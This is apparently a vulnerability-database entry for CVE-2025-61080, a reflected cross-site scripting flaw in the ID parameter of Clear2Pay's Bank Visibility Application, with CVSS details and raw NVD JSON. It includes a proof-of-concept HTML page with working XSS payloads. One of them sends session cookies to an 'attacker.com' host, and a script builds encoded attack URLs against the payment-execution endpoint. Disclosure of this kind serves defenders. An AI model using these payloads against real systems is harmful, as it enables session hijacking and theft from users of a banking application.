Security Vulnerability Report
中文
CVE-2025-61080 CVSS 5.4 MEDIUM

CVE-2025-61080

Published: 2025-10-28 18:15:39
Last Modified: 2026-04-15 00:35:42

Description

A reflected Cross-Site Scripting (XSS) vulnerability has been identified in Clear2Pay Bank Visibility Application - Payment Execution 1.10.0.104 via the ID parameter in the URL.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Clear2Pay Bank Visibility Application Payment Execution 1.10.0.104

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-61080 PoC - Reflected XSS in Clear2Pay Bank Visibility Application --> <!-- Vulnerable URL Pattern: https://[target]/payment-execution?id=[malicious_payload] --> <!DOCTYPE html> <html> <head> <title>CVE-2025-61080 PoC</title> </head> <body> <h1>CVE-2025-61080 - Clear2Pay XSS PoC</h1> <p>Click the link below to test the reflected XSS vulnerability:</p> <!-- Basic XSS Payload --> <a href='https://target-server/payment-execution?id="><script>alert("XSS")</script>' target='_blank'>Test Basic XSS</a> <!-- Cookie Stealing Payload --> <a href='https://target-server/payment-execution?id="><script>document.location="https://attacker.com/steal?c="+document.cookie</script>' target='_blank'>Test Cookie Stealing</a> <!-- Image Tag Event Handler Payload --> <a href='https://target-server/payment-execution?id="><img src=x onerror="alert(document.domain)">' target='_blank'>Test Image Tag XSS</a> <script> // Auto-generate malicious URLs const baseUrl = 'https://target-server/payment-execution'; const payloads = [ '<script>alert(String.fromCharCode(88,83,83))</script>', '"><script>alert(document.cookie)</script>', '"><img src=x onerror=alert(document.domain)>', '"><svg/onload=alert(document.cookie)>' ]; console.log('Generated Payloads:'); payloads.forEach((payload, index) => { console.log(`Payload ${index + 1}: ${baseUrl}?id=${encodeURIComponent(payload)}`); }); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61080", "sourceIdentifier": "[email protected]", "published": "2025-10-28T18:15:39.413", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected Cross-Site Scripting (XSS) vulnerability has been identified in Clear2Pay Bank Visibility Application - Payment Execution 1.10.0.104 via the ID parameter in the URL."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://gist.github.com/willyc0de/f05b44696d66b4bc3276234171952bf2", "source": "[email protected]"}, {"url": "https://gist.github.com/willyc0de/f05b44696d66b4bc3276234171952bf2", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}